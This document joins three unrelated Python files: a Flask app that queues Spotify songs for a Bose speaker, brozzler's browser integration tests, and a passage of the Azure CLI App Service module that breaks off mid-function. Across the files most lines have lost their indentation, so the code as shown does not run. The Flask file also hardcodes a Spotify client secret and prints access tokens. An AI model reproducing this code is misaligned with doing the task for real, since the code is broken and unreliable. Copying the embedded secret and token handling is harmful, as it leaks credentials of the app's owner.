app.py
import requests
from flask import Flask, render_template, request, redirect, make_response
from song import Song
import json
import spotify
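# Note: Queue appears to be a project-local song-queue class (it exposes
# nowPlaying, size, add, upvote and downvote below), not the standard library module.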
from Queue import Queue
import datetime
import random, string
from threading import Thread
from bosesoundhooks import play, getTime
import webbrowser
from time import sleep
access_token = ''
app = Flask(__name__)
songs = Queue()
searchResults = []
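# Each browser gets a random identifier stored in the 'username' cookie (set in
# index() below); queue additions and up/down votes are keyed on that value.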
def generateUname():
return ''.join(random.choices(string.ascii_letters + string.digits, k=10))
@app.route('/') #Queue
def index():
    if request.cookies.get('username') is None:
resp = make_response(render_template('queue.html', songArray=songs.queue, size=songs.size, nowPlaying=songs.nowPlaying, error=None, errorone=None,errortwo=None))
resp.set_cookie('username', generateUname(), expires=datetime.datetime.now() + datetime.timedelta(days=30))
return resp
return render_template('queue.html', songArray=songs.queue, size=songs.size, nowPlaying=songs.nowPlaying, error=None, errorone=None, errortwo=None)
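# Search forwards the form query to Spotify's /v1/search endpoint (track type,
# US market, limit 5) using the access token obtained in /login, and renders
# the matches so they can be added to the queue.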
@app.route('/search', methods=['GET', 'POST'])
def search():
global searchResults
if request.method == 'POST':
query = request.form['SongSearch']
if query == '':
return render_template('queue.html', songArray=songs.queue, size=songs.size, nowPlaying=songs.nowPlaying, error=None, errorone=None, errortwo='e1')
url = 'https://api.spotify.com/v1/search'
        header = {'Authorization': 'Bearer {}'.format(access_token)}
payload = {'q':query, 'type':'track', 'market':'US', 'limit':5}
try:
r = requests.get(url, params = payload, headers = header)
except Exception as e:
print(str(e))
return redirect('/',code=302)
searchResultshere = spotify.saveResults(r.json())
for obj in searchResultshere:
searchResults.append(obj)
return render_template('search.html', searchArray=searchResultshere)
@app.route('/add/<uri>')
def add(uri):
    global searchResults
    for song in searchResults:
        if song.info['uri'] == uri:
            name = request.cookies.get('username')
            if songs.add(song, name) is None:
                return redirect("/", code=302)
            return render_template('queue.html', songArray=songs.queue, size=songs.size, nowPlaying=songs.nowPlaying, error=None, errorone='e1', errortwo=None)
    # No search result matches this uri; redirect to the queue instead of
    # falling through and returning None (which Flask treats as an error).
    return redirect("/", code=302)
@app.route('/downvote/<uri>')
def downvote(uri):
if songs.downvote(uri, request.cookies.get('username')) != 'e1':
return redirect("/", code=302)
else:
return render_template('queue.html', songArray=songs.queue, size=songs.size, nowPlaying=songs.nowPlaying, error='e1', errorone=None, errortwo=None)
@app.route('/upvote/<uri>')
def upvote(uri):
if songs.upvote(uri, request.cookies.get('username')) != 'e1':
return redirect("/", code=302)
else:
return render_template('queue.html', songArray=songs.queue, size=songs.size, nowPlaying=songs.nowPlaying, error='e1', errorone=None, errortwo=None)
def nextSong():
songs.nowPlaying = songs.get()
redirect('/', code=302)
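# Spotify's authorization flow redirects back here with ?code=... (the
# /authorize URL opened at startup points redirect_uri at this route); the
# code is exchanged for the access token used by /search.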
@app.route('/login')
def login():
global access_token
auth_code = request.args.get('code')
payload = {'grant_type':'authorization_code', 'code':auth_code, 'redirect_uri':'http://localhost:8000/login',
'client_id': 'def27a12301844df8891ddab406ef2a3', 'client_secret':'0fce580315d64fc589cfd858a3319614'
}
token = requests.post('https://accounts.spotify.com/api/token', data = payload)
data = token.json()
access_token = data['access_token']
print(access_token)
return redirect("http://localhost:8000")
@app.route('/qrcode')
def displayQR():
return render_template('qrcode.html')
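# Background playback loop: sleeps 10 seconds on the first call, waits until a
# track is set as nowPlaying, sends it to the speaker via play(), then polls
# getTime() until it drops to 5 or below before dequeuing the next song and
# recursing; when the queue is empty the thread simply exits.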
def worker(x=0):
    if x == 0:
sleep(10)
print('working')
    while songs.nowPlaying is None:
print('Nothing playing')
sleep(1)
play(songs.nowPlaying)
sleep(3)
a = getTime()
if (a - 10) > 0:
sleep(a-10)
while getTime() > 5:
sleep(1)
if songs.size >= 1:
songs.nowPlaying = songs.get()
return worker(x+1)
else:
return
if __name__ == '__main__':
print('Starting thread')
t = Thread(target=worker)
t.start()
webbrowser.open('https://accounts.spotify.com/authorize/?client_id=def27a12301844df8891ddab406ef2a3&response_type=code&redirect_uri=http%3A%2F%2Flocalhost%3A8000%2Flogin')
app.run(host = '0.0.0.0', port=8000, debug=False)
test_brozzling.py
#!/usr/bin/env python
'''
test_brozzling.py - integration tests exercising brozzler's browser behavior against a local test http server
Copyright (C) 2016-2018 Internet Archive
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import pytest
import brozzler
import logging
import os
import http.server
import threading
import argparse
import urllib.request
import urllib.error
import json
import socket
args = argparse.Namespace()
args.log_level = logging.INFO
brozzler.cli.configure_logging(args)
WARCPROX_META_420 = {
'stats': {
'test_limits_bucket': {
'total': {'urls': 0, 'wire_bytes': 0},
'new': {'urls': 0, 'wire_bytes': 0},
'revisit': {'urls': 0, 'wire_bytes': 0},
'bucket': 'test_limits_bucket'
}
},
'reached-limit': {'test_limits_bucket/total/urls': 0}
}
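# Module-scoped test web server: serves the files in the htdocs directory next
# to this file and adds a few special endpoints used by the tests below
# (/420 simulating warcprox's "reached limit" response, /401 for basic auth,
# /login-action accepting the login form POST).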
@pytest.fixture(scope='module')
def httpd(request):
class RequestHandler(http.server.SimpleHTTPRequestHandler):
def __init__(self, *args, **kwargs):
self.extensions_map['.mpd'] = 'video/vnd.mpeg.dash.mpd'
http.server.SimpleHTTPRequestHandler.__init__(self, *args, **kwargs)
def do_GET(self):
if self.path == '/420':
self.send_response(420, 'Reached limit')
self.send_header('Connection', 'close')
self.send_header('Warcprox-Meta', json.dumps(WARCPROX_META_420))
payload = b'request rejected by warcprox: reached limit test_limits_bucket/total/urls=0\n'
self.send_header('Content-Type', 'text/plain;charset=utf-8')
self.send_header('Content-Length', len(payload))
self.end_headers()
self.wfile.write(payload)
elif self.path == '/401':
self.send_response(401)
self.send_header('WWW-Authenticate', 'Basic realm=\"Test\"')
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(self.headers.get('Authorization', b''))
self.wfile.write(b'not authenticated')
else:
super().do_GET()
def do_POST(self):
if self.path == '/login-action':
self.send_response(200)
payload = b'login successful\n'
self.send_header('Content-Type', 'text/plain;charset=utf-8')
self.send_header('Content-Length', len(payload))
self.end_headers()
self.wfile.write(payload)
else:
super().do_POST()
# SimpleHTTPRequestHandler always uses CWD so we have to chdir
os.chdir(os.path.join(os.path.dirname(__file__), 'htdocs'))
httpd = http.server.HTTPServer(('localhost', 0), RequestHandler)
httpd_thread = threading.Thread(name='httpd', target=httpd.serve_forever)
httpd_thread.start()
def fin():
httpd.shutdown()
httpd.server_close()
httpd_thread.join()
request.addfinalizer(fin)
return httpd
def test_httpd(httpd):
'''
Tests that our http server is working as expected, and that two fetches
of the same url return the same payload, proving it can be used to test
deduplication.
'''
    payload1 = payload2 = None
url = 'http://localhost:%s/site1/file1.txt' % httpd.server_port
with urllib.request.urlopen(url) as response:
assert response.status == 200
payload1 = response.read()
assert payload1
with urllib.request.urlopen(url) as response:
assert response.status == 200
payload2 = response.read()
assert payload2
assert payload1 == payload2
url = 'http://localhost:%s/420' % httpd.server_port
with pytest.raises(urllib.error.HTTPError) as excinfo:
urllib.request.urlopen(url)
assert excinfo.value.getcode() == 420
def test_aw_snap_hes_dead_jim():
chrome_exe = brozzler.suggest_default_chrome_exe()
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
with pytest.raises(brozzler.BrowsingException):
browser.browse_page('chrome://crash')
# chromium's 401 handling changed???
@pytest.mark.xfail
def test_page_interstitial_exception(httpd):
chrome_exe = brozzler.suggest_default_chrome_exe()
url = 'http://localhost:%s/401' % httpd.server_port
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
with pytest.raises(brozzler.PageInterstitialShown):
browser.browse_page(url)
def test_on_response(httpd):
response_urls = []
def on_response(msg):
response_urls.append(msg['params']['response']['url'])
chrome_exe = brozzler.suggest_default_chrome_exe()
url = 'http://localhost:%s/site3/page.html' % httpd.server_port
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
browser.browse_page(url, on_response=on_response)
assert response_urls[0] == 'http://localhost:%s/site3/page.html' % httpd.server_port
assert response_urls[1] == 'http://localhost:%s/site3/brozzler.svg' % httpd.server_port
assert response_urls[2] == 'http://localhost:%s/favicon.ico' % httpd.server_port
def test_420(httpd):
chrome_exe = brozzler.suggest_default_chrome_exe()
url = 'http://localhost:%s/420' % httpd.server_port
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
with pytest.raises(brozzler.ReachedLimit) as excinfo:
browser.browse_page(url)
assert excinfo.value.warcprox_meta == WARCPROX_META_420
def test_js_dialogs(httpd):
chrome_exe = brozzler.suggest_default_chrome_exe()
url = 'http://localhost:%s/site4/alert.html' % httpd.server_port
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
# before commit d2ed6b97a24 these would hang and eventually raise
# brozzler.browser.BrowsingTimeout, which would cause this test to fail
browser.browse_page(
'http://localhost:%s/site4/alert.html' % httpd.server_port)
browser.browse_page(
'http://localhost:%s/site4/confirm.html' % httpd.server_port)
browser.browse_page(
'http://localhost:%s/site4/prompt.html' % httpd.server_port)
# XXX print dialog unresolved
# browser.browse_page(
# 'http://localhost:%s/site4/print.html' % httpd.server_port)
def test_page_videos(httpd):
# test depends on behavior of youtube-dl and chromium, could fail and need
# to be adjusted on youtube-dl or chromium updates
chrome_exe = brozzler.suggest_default_chrome_exe()
worker = brozzler.BrozzlerWorker(None)
site = brozzler.Site(None, {})
page = brozzler.Page(None, {
'url':'http://localhost:%s/site6/' % httpd.server_port})
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
worker.brozzle_page(browser, site, page)
assert page.videos
assert len(page.videos) == 4
assert page.videos[0] == {
'blame': 'youtube-dl',
'response_code': 200,
'content-length': 383631,
'content-type': 'video/mp4',
'url': 'http://localhost:%s/site6/small.mp4' % httpd.server_port,
}
assert page.videos[1] == {
'blame': 'youtube-dl',
'content-length': 92728,
'content-type': 'video/webm',
'response_code': 200,
'url': 'http://localhost:%s/site6/small-video_280x160_100k.webm' % httpd.server_port
}
assert page.videos[2] == {
'blame': 'youtube-dl',
'content-length': 101114,
'content-type': 'video/webm',
'response_code': 200,
'url': 'http://localhost:%s/site6/small-audio.webm' % httpd.server_port
}
assert page.videos[3] == {
'blame': 'browser',
# 'response_code': 206,
# 'content-range': 'bytes 0-229454/229455',
'response_code': 200,
'content-length': 229455,
'content-type': 'video/webm',
'url': 'http://localhost:%s/site6/small.webm' % httpd.server_port,
}
def test_extract_outlinks(httpd):
chrome_exe = brozzler.suggest_default_chrome_exe()
worker = brozzler.BrozzlerWorker(None)
site = brozzler.Site(None, {})
page = brozzler.Page(None, {
'url':'http://localhost:%s/site8/' % httpd.server_port})
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
outlinks = worker.brozzle_page(browser, site, page)
assert outlinks == {
'http://example.com/offsite',
'http://localhost:%s/site8/baz/zuh' % httpd.server_port,
'http://localhost:%s/site8/fdjisapofdjisap#1' % httpd.server_port,
'http://localhost:%s/site8/fdjisapofdjisap#2' % httpd.server_port
}
def test_proxy_down():
'''
Test that browsing raises `brozzler.ProxyError` when proxy is down.
See also `test_proxy_down` in test_units.py.
Tests two different kinds of connection error:
    - nothing listening on the port (nobody listens on port 4 :))
- port bound but not accepting connections
'''
sock = socket.socket()
sock.bind(('127.0.0.1', 0))
for not_listening_proxy in (
'127.0.0.1:4', '127.0.0.1:%s' % sock.getsockname()[1]):
site = brozzler.Site(None, {'seed':'http://example.com/'})
page = brozzler.Page(None, {'url': 'http://example.com/'})
worker = brozzler.BrozzlerWorker(
frontier=None, proxy=not_listening_proxy)
chrome_exe = brozzler.suggest_default_chrome_exe()
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
with pytest.raises(brozzler.ProxyError):
worker.brozzle_page(browser, site, page)
def test_try_login(httpd):
"""Test try_login behavior.
"""
response_urls = []
def on_response(msg):
response_urls.append(msg['params']['response']['url'])
chrome_exe = brozzler.suggest_default_chrome_exe()
form_url = 'http://localhost:%s/site11/form1.html' % httpd.server_port
form_url_other = 'http://localhost:%s/site11/form2.html' % httpd.server_port
favicon_url = 'http://localhost:%s/favicon.ico' % httpd.server_port
login_url = 'http://localhost:%s/login-action' % httpd.server_port
# When username and password are defined and initial page has login form,
# detect login form, submit login, and then return to the initial page.
username = 'user1'
password = 'pass1'
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
browser.browse_page(form_url, username=username, password=password,
on_response=on_response)
assert len(response_urls) == 4
assert response_urls[0] == form_url
assert response_urls[1] == favicon_url
assert response_urls[2] == login_url
assert response_urls[3] == form_url
    # We now support a different type of login form as well; test it here.
response_urls = []
username = 'user1'
password = 'pass1'
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
browser.browse_page(form_url_other, username=username, password=password,
on_response=on_response)
assert len(response_urls) == 4
assert response_urls[0] == form_url_other
assert response_urls[1] == favicon_url
assert response_urls[2] == login_url
assert response_urls[3] == form_url_other
# When username and password are not defined, just load the initial page.
response_urls = []
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
browser.browse_page(form_url, on_response=on_response)
assert len(response_urls) == 2
assert response_urls[0] == form_url
assert response_urls[1] == favicon_url
# when the page doesn't have a form with username/password, don't submit it
response_urls = []
form_without_login_url = 'http://localhost:%s/site11/form-no-login.html' % httpd.server_port
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
browser.browse_page(form_without_login_url, username=username,
password=password, on_response=on_response)
assert len(response_urls) == 2
assert response_urls[0] == form_without_login_url
assert response_urls[1] == favicon_url
custom.py
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
import time
import ast
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
from http import HTTPStatus
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo, DefaultErrorResponseException
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait, get_file_json
from azure.cli.core.util import get_az_user_agent, send_raw_request
from azure.cli.core.profiles import ResourceType, get_sdk
from azure.cli.core.azclierror import (ResourceNotFoundError, RequiredArgumentMissingError, ValidationError,
CLIInternalError, UnclassifiedUserFault, AzureResponseError,
ArgumentUsageError, MutuallyExclusiveArgumentError)
from .tunnel import TunnelServer
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation
from .utils import _normalize_sku, get_sku_name, retryable_method
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
should_create_new_rg, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src, get_current_stack_from_runtime, generate_default_app_name)
from ._constants import (FUNCTIONS_STACKS_API_JSON_PATHS, FUNCTIONS_STACKS_API_KEYS,
FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX,
NODE_EXACT_VERSION_DEFAULT, RUNTIME_STACKS, FUNCTIONS_NO_V2_REGIONS, PUBLIC_CLOUD)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionality.
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None, assign_identities=None,
role='Contributor', scope=None):
SiteConfig, SkuDescription, Site, NameValuePair = cmd.get_models(
'SiteConfig', 'SkuDescription', 'Site', 'NameValuePair')
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist in the resource group '{}".format(plan, resource_group_name))
is_linux = plan_info.reserved
node_default_version = NODE_EXACT_VERSION_DEFAULT
location = plan_info.location
    # Keep the existing app settings when the name refers to a webapp that already exists.
name_validation = get_site_availability(cmd, name)
if not name_validation.name_available:
if name_validation.reason == 'Invalid':
raise CLIError(name_validation.message)
logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that "
"the app is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in resource group '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
name, 'list_application_settings')
settings = []
for k, v in existing_app_settings.properties.items():
settings.append(NameValuePair(name=k, value=v))
site_config = SiteConfig(app_settings=settings)
else:
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=using_webapp_up)
helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
if runtime:
runtime = helper.remove_delimiters(runtime)
current_stack = None
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
if deployment_container_image_name:
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
# set the needed app settings for container image validation
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
value=docker_registry_server_user))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
value=docker_registry_server_password))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
value=docker_registry_server_url))
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Windows runtime '{}' is not supported. "
"Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
        # portal uses the current_stack property in metadata to display stack for windows apps
current_stack = get_current_stack_from_runtime(runtime)
else: # windows webapp without runtime specified
if name_validation.name_available: # If creating new webapp
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a help method for webapp up
if name_validation.name_available:
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'
.format(name)))
poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
if current_stack:
_update_webapp_current_stack_property_if_needed(cmd, resource_group_name, name, current_stack)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
webapp.identity = identity
return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
    return len([x for x in opts if x]) == 1  # you can specify only one of these option combinations
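# Derives the registry server URL from a container image name: everything
# before the last '/' is returned (e.g. an illustrative
# 'myregistry.azurecr.io/app:v1' yields 'myregistry.azurecr.io'), while Docker
# Hub style names whose registry part has no '.' or ':' yield None.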
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
slash_ix = deployment_container_image_name.rfind('/')
docker_registry_server_url = deployment_container_image_name[0:slash_ix]
if slash_ix == -1 or ("." not in docker_registry_server_url and ":" not in docker_registry_server_url):
return None
return docker_registry_server_url
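# --settings/--slot-settings accept either KEY=VALUE pairs or the JSON produced
# by the corresponding "list" command; names passed as slot settings are also
# recorded in the slot configuration names so they remain bound to the slot.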
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest in [(settings, result), (slot_settings, slot_result)]:
for s in src:
try:
temp = shell_safe_json_parse(s)
                if isinstance(temp, list):  # a bit messy, but we'd like to accept the output of the "list" command
for t in temp:
if t.get('slotSetting', True):
slot_result[t['name']] = t['value']
# Mark each setting as the slot setting
else:
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(slot_result)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
new_slot_setting_names = slot_result.keys()
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
slot_cfg_names.app_setting_names += new_slot_setting_names
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
if app is None:
raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
'Please make sure these values are correct.'.format(name, resource_group_name))
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
    # We need to retry getting the plan because, when the plan is created as part
    # of the function app, it can take a few attempts before it becomes available
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
if build_remote and not app.reserved:
raise CLIError('Remote build is only available on Linux function apps')
is_consumption = is_plan_consumption(cmd, plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
else:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
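# Zip deploy posts the package to Kudu's /api/zipdeploy endpoint using the
# site's publishing credentials as basic auth, then polls
# /api/deployments/latest until the asynchronous deployment completes.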
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['Content-Type'] = 'application/octet-stream'
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
